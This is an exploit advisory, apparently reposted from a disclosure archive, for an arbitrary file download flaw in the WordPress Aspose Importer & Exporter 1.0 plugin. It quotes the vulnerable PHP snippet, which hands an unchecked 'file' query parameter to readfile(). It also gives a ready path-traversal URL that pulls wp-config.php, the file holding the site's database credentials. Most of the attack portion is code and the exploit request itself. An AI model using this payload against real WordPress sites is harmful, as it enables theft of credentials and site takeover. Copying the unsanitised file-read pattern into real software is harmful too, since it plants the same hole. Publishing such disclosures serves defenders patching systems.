Home / os / wins2003

WordPress Aspose Importer / Exporter 1.0 File Download

Posted on 31 March 2015

#########################################

Exploit Title : Wordpress Aspose Importer & Exporter v1.0 Plugin File
Download Vulnerability

Exploit Author : Ashiyane Digital Security Team

Vendor Homepage: https://wordpress.org/plugins/aspose-importer-exporter/

Download Link :
https://downloads.wordpress.org/plugin/aspose-importer-exporter.2.0.zip

Date : 28 / 3 / 2015

Tested On : windows 8.1 + linux Kali

#########################################
#########################################

~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>

Exploit:
Vulnerable file :
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download

~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>

Vulnerable Code :

<?php

if(isset($_GET['file'])) {

 $file = $_GET['file'];

 $file_arr = explode('/',$file);

 $file_name = $file_arr[count($file_arr) - 1];

 header ("Content-type: octet/stream");

 header ("Content-disposition: attachment; filename=".$file_name.";");

 header("Content-Length: ".filesize($file));

 readfile($file);

 exit;

}

http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=[File
Address]

Examples :
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php

#########################################
#########################################

Discovered by : Rq07

#########################################

 

TOP